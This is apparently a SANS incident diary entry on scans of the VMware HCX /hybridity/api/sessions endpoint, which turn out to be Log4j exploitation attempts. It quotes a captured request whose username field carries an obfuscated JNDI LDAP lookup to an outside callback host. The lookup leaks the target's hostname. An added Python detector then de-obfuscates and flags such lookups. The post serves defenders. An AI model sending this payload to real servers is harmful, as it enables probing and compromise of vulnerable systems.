Scans for VMWare Hybrid Cloud Extension (HCX) API (Log4j - not brute forcing)
Today, I noticed increased scans for the VMware Hybrid Cloud Extension (HCX) "sessions" endpoint. Requests to this endpoint are sometimes associated with exploit attempts against various VMware vulnerabilities, either to determine whether the system is running the extension or to gather additional information to aid exploitation.
Initially, based on the URL, I suspected brute forcing. However, after reviewing some complete requests (see below), it turns out that these attempts are exploiting the Log4j vulnerability.
The specific URL seen above is
/hybridity/api/sessions
This particular request is likely used to brute force credentials. The "sessions" endpoint expects a JSON payload with the username and password, like:
{
"username": "admin",
"password": "somecomplexpassword"
}
The response will either be a 401 response if the authentication failed or a 200 response if it succeeded. A successful response includes a "sessionId", which will be used as a bearer token to authenticate additional requests.
UPDATED ANALYSIS
Initially, I did not have access to the request payload. However, after reviewing the payload of a few samples, it looks like these are not brute-force attempts. Instead, they are exploiting the Log4j vulnerability via the "username" parameter: the username is likely written to a log by the Log4j library, which VMware uses and which was vulnerable to this issue.
Complete request:
POST /hybridity/api/sessions HTTP/1.1
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Content-Length: 169
Accept: application/json
Content-Type: application/json
Origin: https://[victim IP]:4443
Accept-Encoding: gzip
{\r\n "authType": "password",\r\n "username": "${jndi:ldap://${:-670}${:-930}.${hostName}.username.cv7u8tq2cnhfm80gc3n0npwaauo98azq9.oast.live}",\r\n "password": "admin"\r\n}
So far, we have seen these requests mostly from one IP address, 107.173.125.163, using randomized but valid user agents. The IP address was first seen yesterday in our logs and is scanning for Log4j-vulnerable systems, particularly by accessing login pages. These other attempts likely use a payload similar to the request above. See this page for a complete list of requests sent by this IP address.
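The "username" value in the request above hides its JNDI lookup behind nested ${:-...} default-value lookups and a ${hostName} lookup, so a naive substring match for "${jndi:" on the raw body would miss it. As an added example (not code from the diary or from VMware), the Python routine below does what a defender reviewing captured requests to this endpoint would want: it resolves the lookup syntax from the inside out, flags any JSON field that still contains a JNDI lookup afterwards, and extracts the scheme and callback host for alerting or blocking. The resolution rules, the Finding structure and the sample requests are assumptions constructed for this example; the sample body reuses the payload shown above with a placeholder victim host.

```python
import json
import re
from dataclasses import dataclass

# Innermost ${...} lookup (no nested braces inside); resolved repeatedly from the inside out.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with its scheme and the host part that follows the scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:([a-z]+):/*([^/\s}]+)", re.IGNORECASE)


def normalize_lookups(value: str, max_rounds: int = 50) -> str:
    """Collapse Log4j-style lookups so an obfuscated ${jndi:...} becomes visible.

    Resolution rules (an assumption made for this example, sufficient for the
    ${:-x} and ${hostName} forms in the diary's request):
      ${:-X} or ${key:-X}      -> X            (default value of an empty/unknown lookup)
      ${lower:X} / ${upper:X}  -> x / X        (case-mapping lookups)
      ${jndi:...}              -> unchanged    (this is what we want to surface)
      any other ${name...}     -> <name>       (placeholder; keeps the structure readable)
    """

    def resolve(match):
        body = match.group(1)
        if body.lower().startswith("jndi:"):
            return match.group(0)
        if ":-" in body:
            return body.split(":-", 1)[1]
        if body.lower().startswith("lower:"):
            return body[6:].lower()
        if body.lower().startswith("upper:"):
            return body[6:].upper()
        return "<" + body.split(":", 1)[0] + ">"

    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(resolve, value)
        if resolved == value:  # nothing left to resolve (or only ${jndi:...} remains)
            break
        value = resolved
    return value


@dataclass
class Finding:
    field: str        # JSON field carrying the lookup (e.g. "username")
    normalized: str   # field value after de-obfuscation
    scheme: str       # JNDI scheme, e.g. "ldap"
    host: str         # callback host the lookup would contact


def inspect_sessions_body(raw_body: str) -> list:
    """Parse the JSON body of a POST to /hybridity/api/sessions and report every
    string field that carries a JNDI lookup once lookups are de-obfuscated."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return []
    if not isinstance(body, dict):
        return []
    findings = []
    for name, value in body.items():
        if not isinstance(value, str):
            continue
        normalized = normalize_lookups(value)
        hit = JNDI_LOOKUP.search(normalized)
        if hit:
            findings.append(Finding(name, normalized, hit.group(1).lower(), hit.group(2)))
    return findings


def scan_request(raw_request: str) -> list:
    """Split a raw HTTP request into request line, headers and body; only
    POSTs to the HCX sessions endpoint are inspected."""
    head, _, body = raw_request.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST" or not parts[1].startswith("/hybridity/api/sessions"):
        return []
    return inspect_sessions_body(body)


# Constructed sample: the diary's request body, with a placeholder victim host in Origin.
SAMPLE_REQUEST = (
    "POST /hybridity/api/sessions HTTP/1.1\r\n"
    "Content-Type: application/json\r\n"
    "Origin: https://[victim IP]:4443\r\n"
    "\r\n"
    '{"authType": "password", '
    '"username": "${jndi:ldap://${:-670}${:-930}.${hostName}.username.'
    'cv7u8tq2cnhfm80gc3n0npwaauo98azq9.oast.live}", '
    '"password": "admin"}'
)

# Constructed benign login for comparison (not from the diary).
BENIGN_REQUEST = (
    "POST /hybridity/api/sessions HTTP/1.1\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"authType": "password", "username": "admin", "password": "somecomplexpassword"}'
)

if __name__ == "__main__":
    for f in scan_request(SAMPLE_REQUEST):
        print(f"{f.field}: jndi/{f.scheme} -> {f.host}")
    print("benign findings:", scan_request(BENIGN_REQUEST))
```

Run against the sample, the username field is reported with scheme "ldap" and the callback host "670930.<hostName>.username.cv7u8tq2cnhfm80gc3n0npwaauo98azq9.oast.live", which shows both the data the payload exfiltrates (the victim's hostname) and the interaction domain worth alerting on; the benign login produces no findings. The same inspection can be applied to any other logged request field, since the vulnerability depends on what gets logged rather than on this one endpoint.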
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu